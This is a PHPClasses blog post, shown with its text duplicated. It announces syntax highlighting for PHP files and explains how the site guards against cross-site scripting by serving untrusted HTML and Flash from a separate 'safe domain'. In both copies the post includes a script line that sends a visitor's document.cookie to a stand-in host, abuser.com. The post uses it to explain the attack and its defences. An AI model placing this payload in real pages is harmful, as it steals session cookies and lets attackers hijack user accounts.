Author: Manuel Lemos
Viewers: 26
Last month viewers: 11
Categories: PHP Security
This post announces several improvements on the way of viewing the files of the packages available on the site.
An extensive explanation is provided about the security concerns of presenting content from untrusted sources, specifically those that may lead to security abuses known as cross-site scripting.
Several solutions to prevent cross-site script exploits are presented. A solution named "safe domain" used by the site, that is not very well known, is presented in detail.
An extensive explanation is provided about the security concerns of presenting content from untrusted sources, specifically those that may lead to security abuses known as cross-site scripting.
Several solutions to prevent cross-site script exploits are presented. A solution named "safe domain" used by the site, that is not very well known, is presented in detail.
Contents
* PHP code syntax highlighting
* Feature suggestions
* Inadvertent bandwidth and CPU usage
* Inline HTML and Flash files
* Cross-site scripting security exploit prevention
* Advertising, mash-ups and RSS feeds concerns
* Avoiding cross-site scripting exploits
* The safe domain technique
* Other file types
* Other concerns
* PHP code syntax highlighting
One of the most appreciated features of the PHPClasses site is the ability of view the contents files of a page without need to download it first. This month this feature has been improved in several aspects.
One of the aspects is the color highlighting of PHP source code files. This was done with the PHP built-in function highlight_string . The colors are a bit different than the PHP defaults. Hopefully the current color choice is more readable.
If you are color blind or have another kind of eye sight limitation, just let me know if there are any other adjustments to the color scheme that can be done to improve the readability.
* Feature suggestions
Although most users agree that PHP syntax highlighting is a good thing, only now it has been finally implemented. Actually it was a feature suggested by Brandon Sussman. He submitted the idea to the bug report database as a feature enhancement.
Other people have suggested this and other features, but it is hard to keep track all the requests and remember to implement them later when they are not recorded in this database.
If you have more feature requests, please do not hesitate to submit them to the PHPClasses bug database:
I also received suggestions to implement code highlighting for source files of other languages. I plan to do it when I have more time to deploy components that implement code highlighting for other languages. I also got a good suggestion to use the GesHi package of Nigel McNie that supports many languages.
* Inadvertent bandwidth and CPU usage
Unfortunately, features that seem simple to implement, like the PHP code syntax highlighting, do not come free. The HTML code of the highlighted became 4 to 5 times larger than the original files.
The PHPClasses site uses mod_gzip to serve all pages in compressed format, whether they were generated by PHP or not.
If you are using Apache 2, you can also use mod_deflate built-in module.
This is very good because it reduces the size of HTML pages at least 5 times. In the case of highlighted PHP code, the size of the pages became in average 15 times smaller because it uses too many repeated <font> tags.
This is a great reduction but it consumes too much CPU when done on demand. Therefore PHP code highlighting is restricted to files smaller than a given size limit. Currently the size limit is 10KB, but it may vary in the future. Premium subscribers will always see all PHP files highlighted.
* Inline HTML and Flash files
The presentation of HTML and Flash files was also improved.
Formerly, they used to be displayed in a separate browser window. Now, these types of files are displayed in the same file page using an inline frame. Nowadays, most browser support inline frames, so this solution should not cause any problems.
* Cross-site scripting security exploit prevention
Displaying the HTML and Flash files submitted by the site users raises certain security concerns.
The problem is that these kinds of files may contain scripting code in either JavaScript or ActionScript. Such code may executed when the files are displayed in a common browser.
Despite I do not expect that an author submits HTML or Flash files with malicious code, I may not assume that such possibility will never happen.
Wherever you provide a privilege, soon or later somebody will try to abuse it. So, better be safe now, than sorry later. Therefore, such kinds of files are treated as untrusted content.
If you are not aware what are the security hazards of serving untrusted content, let me explain what could happen.
When you serve HTML or Flash files from a certain domain, the contained JavaScript or ActionScript may have access to all the cookies served by that domain.
This circumstance can be abused using files with malicious code that could send the cookies of one domain to another site by performing requests to URLs composed using JavaScript/ActionScript. This is why these security exploits are called cross-site scripting.
Consider for instance the following HTML excerpt with malicious JavaScript. Flash files may also contain ActionScript code for the same purpose.
<script>
document.write('<script src="http://www.abuser.com/get_cookies?cookies=' + document.cookie + '"></script>');
</script>
The problem is that cookies are often used as session identifiers of logged users. If somebody steals the cookies that your browser uses to access a domain, that person can access the same site on your behalf and abuse from the privileges that you have.
Depending on what each site provides, the consequences can be catastrophic. Imagine if you are accessing an e-commerce site that stores information about your credit card and displays it in your profile pages. An attacker may steal that information and cause you financial losses.
Of course most e-commerce sites are not so weakly implemented, but you can always imagine myriad of situations on which a cross-site scripting exploits may cause major headaches.
* Advertising, mash-ups and RSS feeds concerns
Another form of cross-site scripting exploit may occur when one site displays HTML content from another site.
Most forms of advertising served by ad agencies require placing HTML tags that contain Javascript tags to retrieve the ad contents from remote servers.
Most ad agencies are reputed and can be considered trustworthy, but I have already read reports of users complaining that certain ads cause undesirable effects like prompting the users to download malware or other kind of intrusive programs.
Although this is not exactly a cross-site scripting exploit, I wonder if all the Javascript and Flash animations placed by all advertising agencies is carefully audited.
Another topic that makes me wonder is the recent mania about mash-up sites. As I explained in a previous post, mash-ups are sites composed of content retrieved from other sites.
In many cases the remote content is served via Javascript, so it can be updated dynamically without changing the mash-up site. This is another eventual way by which the cookies served by one domain can be accessed by the remote site scripts.
Another way to obtain content from other sites is through the use of RSS feeds. In the beginning this used to not really be a problem because you were only syndicating text content.
As long as you encode the text properly to display in HTML pages, using for instance the HtmlSpecialChars() function, there is nothing to be concerned with RSS feeds.
Meanwhile several sites started providing HTML content within their RSS feeds. This should never be a problem as long as you use only the plain text feed items.
However, if you use the HTML content as it is served withing such RSS feeds, there is always the chance for abuse by the means of HTML tags with malicious JavaScript code on them.
All these concerns should be taken seriously only if you have reason to not trust the HTML code that you are using from other sites.
* Avoiding cross-site scripting exploits
There are several techniques to avoid or at least minimize eventual cross-site scripting exploits.
One of the techniques consists on filtering the HTML code to remove any JavaScript. There are several solutions for that purpose, like the PHP Input Filter class by Daniel Morris:
Solutions like this are great, but unfortunately they require removing parts of the HTML pages that may be necessary to make them display properly.
There are also solutions to minimize the chances of successful session cookie stealing, like for instance, session identifier regeneration and origin IP verification. You may find several classes that implement these solutions here:
These solutions are advisable but they are not perfect because they do not eliminate the problem.
* The safe domain technique
The PHPClasses relies mostly on a solution to serve untrusted content that is called "safe domain". It is in place since a couple of years ago. Before that, the site was not displaying HTML or Flash files directly.
The cookies that may be stolen by content with malicious JavaScript/ActionScript code are only the cookies of the domain from which the content is served.
Therefore the PHPClasses site serves untrusted content from a different domain. It is not phpclasses.org nor a sub-domain. Currently it uses a domain named safe.phpclasses.net . Notice that even the top level domain .net is different from .org .
This is made transparent for the user. As I mentioned above, the HTML and Flash files are served in an inline frame.
Since the frame and the parent browser window are from different domains, an eventual attempt of malicious JavaScript code of the HTML in the inline frame to access the cookies of the actual site cookies, would result in a Javascript security error.
This way the site can display untrusted HTML or Flash without mangling it.
* Other file types
Several authors asked me to allow submitting files in other formats like for instance PDF. I have been reluctant to do so, also for security reasons.
First, I need to have a way to verify whether the files are exactly of the the type they claim to be. I cannot do it like under Windows and other insecure systems that rely on the file name extension to determine the file type.
Second, I need to determine whether each file type is safe to be served to the users' browsers without relying on manual auditing. It would not be admissible to serve files that may be used to spread any form of virus or malware.
Over time I may add support to display other file types if these conditions can be satisfied.
* Other concerns
Security is a delicate matter. No matter how much you learn and apply in practice about security, there will always be other ways to abuse from a site.
If you have questions or other concerns about the security aspects mentioned in this post, feel free to post a comment.
Regards,
Manuel Lemos
* PHP code syntax highlighting
* Feature suggestions
* Inadvertent bandwidth and CPU usage
* Inline HTML and Flash files
* Cross-site scripting security exploit prevention
* Advertising, mash-ups and RSS feeds concerns
* Avoiding cross-site scripting exploits
* The safe domain technique
* Other file types
* Other concerns
* PHP code syntax highlighting
One of the most appreciated features of the PHPClasses site is the ability of view the contents files of a page without need to download it first. This month this feature has been improved in several aspects.
One of the aspects is the color highlighting of PHP source code files. This was done with the PHP built-in function highlight_string . The colors are a bit different than the PHP defaults. Hopefully the current color choice is more readable.
If you are color blind or have another kind of eye sight limitation, just let me know if there are any other adjustments to the color scheme that can be done to improve the readability.
* Feature suggestions
Although most users agree that PHP syntax highlighting is a good thing, only now it has been finally implemented. Actually it was a feature suggested by Brandon Sussman. He submitted the idea to the bug report database as a feature enhancement.
bugs.phpclasses.org/show_bug.cgi?id
...Other people have suggested this and other features, but it is hard to keep track all the requests and remember to implement them later when they are not recorded in this database.
If you have more feature requests, please do not hesitate to submit them to the PHPClasses bug database:
bugs.phpclasses.org/
I also received suggestions to implement code highlighting for source files of other languages. I plan to do it when I have more time to deploy components that implement code highlighting for other languages. I also got a good suggestion to use the GesHi package of Nigel McNie that supports many languages.
phpclasses.org/geshi
* Inadvertent bandwidth and CPU usage
Unfortunately, features that seem simple to implement, like the PHP code syntax highlighting, do not come free. The HTML code of the highlighted became 4 to 5 times larger than the original files.
The PHPClasses site uses mod_gzip to serve all pages in compressed format, whether they were generated by PHP or not.
schroepl.net/projekte/mod_gzip/
If you are using Apache 2, you can also use mod_deflate built-in module.
This is very good because it reduces the size of HTML pages at least 5 times. In the case of highlighted PHP code, the size of the pages became in average 15 times smaller because it uses too many repeated <font> tags.
This is a great reduction but it consumes too much CPU when done on demand. Therefore PHP code highlighting is restricted to files smaller than a given size limit. Currently the size limit is 10KB, but it may vary in the future. Premium subscribers will always see all PHP files highlighted.
* Inline HTML and Flash files
The presentation of HTML and Flash files was also improved.
Formerly, they used to be displayed in a separate browser window. Now, these types of files are displayed in the same file page using an inline frame. Nowadays, most browser support inline frames, so this solution should not cause any problems.
* Cross-site scripting security exploit prevention
Displaying the HTML and Flash files submitted by the site users raises certain security concerns.
The problem is that these kinds of files may contain scripting code in either JavaScript or ActionScript. Such code may executed when the files are displayed in a common browser.
Despite I do not expect that an author submits HTML or Flash files with malicious code, I may not assume that such possibility will never happen.
Wherever you provide a privilege, soon or later somebody will try to abuse it. So, better be safe now, than sorry later. Therefore, such kinds of files are treated as untrusted content.
If you are not aware what are the security hazards of serving untrusted content, let me explain what could happen.
When you serve HTML or Flash files from a certain domain, the contained JavaScript or ActionScript may have access to all the cookies served by that domain.
This circumstance can be abused using files with malicious code that could send the cookies of one domain to another site by performing requests to URLs composed using JavaScript/ActionScript. This is why these security exploits are called cross-site scripting.
Consider for instance the following HTML excerpt with malicious JavaScript. Flash files may also contain ActionScript code for the same purpose.
<script>
document.write('<script src="http://www.abuser.com/get_cookies?cookies=' + document.cookie + '"></script>');
</script>
The problem is that cookies are often used as session identifiers of logged users. If somebody steals the cookies that your browser uses to access a domain, that person can access the same site on your behalf and abuse from the privileges that you have.
Depending on what each site provides, the consequences can be catastrophic. Imagine if you are accessing an e-commerce site that stores information about your credit card and displays it in your profile pages. An attacker may steal that information and cause you financial losses.
Of course most e-commerce sites are not so weakly implemented, but you can always imagine myriad of situations on which a cross-site scripting exploits may cause major headaches.
* Advertising, mash-ups and RSS feeds concerns
Another form of cross-site scripting exploit may occur when one site displays HTML content from another site.
Most forms of advertising served by ad agencies require placing HTML tags that contain Javascript tags to retrieve the ad contents from remote servers.
Most ad agencies are reputed and can be considered trustworthy, but I have already read reports of users complaining that certain ads cause undesirable effects like prompting the users to download malware or other kind of intrusive programs.
Although this is not exactly a cross-site scripting exploit, I wonder if all the Javascript and Flash animations placed by all advertising agencies is carefully audited.
Another topic that makes me wonder is the recent mania about mash-up sites. As I explained in a previous post, mash-ups are sites composed of content retrieved from other sites.
phpclasses.org/blog/post/53-Is-PHP-
...In many cases the remote content is served via Javascript, so it can be updated dynamically without changing the mash-up site. This is another eventual way by which the cookies served by one domain can be accessed by the remote site scripts.
Another way to obtain content from other sites is through the use of RSS feeds. In the beginning this used to not really be a problem because you were only syndicating text content.
As long as you encode the text properly to display in HTML pages, using for instance the HtmlSpecialChars() function, there is nothing to be concerned with RSS feeds.
Meanwhile several sites started providing HTML content within their RSS feeds. This should never be a problem as long as you use only the plain text feed items.
However, if you use the HTML content as it is served withing such RSS feeds, there is always the chance for abuse by the means of HTML tags with malicious JavaScript code on them.
All these concerns should be taken seriously only if you have reason to not trust the HTML code that you are using from other sites.
* Avoiding cross-site scripting exploits
There are several techniques to avoid or at least minimize eventual cross-site scripting exploits.
One of the techniques consists on filtering the HTML code to remove any JavaScript. There are several solutions for that purpose, like the PHP Input Filter class by Daniel Morris:
phpclasses.org/inputfilter
Solutions like this are great, but unfortunately they require removing parts of the HTML pages that may be necessary to make them display properly.
There are also solutions to minimize the chances of successful session cookie stealing, like for instance, session identifier regeneration and origin IP verification. You may find several classes that implement these solutions here:
phpclasses.org/browse/class/78/top/
...These solutions are advisable but they are not perfect because they do not eliminate the problem.
* The safe domain technique
The PHPClasses relies mostly on a solution to serve untrusted content that is called "safe domain". It is in place since a couple of years ago. Before that, the site was not displaying HTML or Flash files directly.
The cookies that may be stolen by content with malicious JavaScript/ActionScript code are only the cookies of the domain from which the content is served.
Therefore the PHPClasses site serves untrusted content from a different domain. It is not phpclasses.org nor a sub-domain. Currently it uses a domain named safe.phpclasses.net . Notice that even the top level domain .net is different from .org .
This is made transparent for the user. As I mentioned above, the HTML and Flash files are served in an inline frame.
Since the frame and the parent browser window are from different domains, an eventual attempt of malicious JavaScript code of the HTML in the inline frame to access the cookies of the actual site cookies, would result in a Javascript security error.
This way the site can display untrusted HTML or Flash without mangling it.
* Other file types
Several authors asked me to allow submitting files in other formats like for instance PDF. I have been reluctant to do so, also for security reasons.
First, I need to have a way to verify whether the files are exactly of the the type they claim to be. I cannot do it like under Windows and other insecure systems that rely on the file name extension to determine the file type.
Second, I need to determine whether each file type is safe to be served to the users' browsers without relying on manual auditing. It would not be admissible to serve files that may be used to spread any form of virus or malware.
Over time I may add support to display other file types if these conditions can be satisfied.
* Other concerns
Security is a delicate matter. No matter how much you learn and apply in practice about security, there will always be other ways to abuse from a site.
If you have questions or other concerns about the security aspects mentioned in this post, feel free to post a comment.
Regards,
Manuel Lemos
You need to be a registered user or login to post a comment
Login Immediately with your account on:
Comments:
1. Syntax highlighter - Alvaro Calleja (2007-06-19 20:03)
A possible solution for syntax highlight... - 2 replies
Read the whole comment and replies
2. I've already had problems navigating the site - Matías montes (2006-07-03 13:24)
I think there's already a script affecting your site... - 3 replies
Read the whole comment and replies
1. How can one make sure embedded third-party JavaScript code is safe? (2011-06-19 21:27)
The greatest danger is that untrused foreign JavaScript steals the user cookies for your domain and sends it to the server of another domain of an eventual attacker...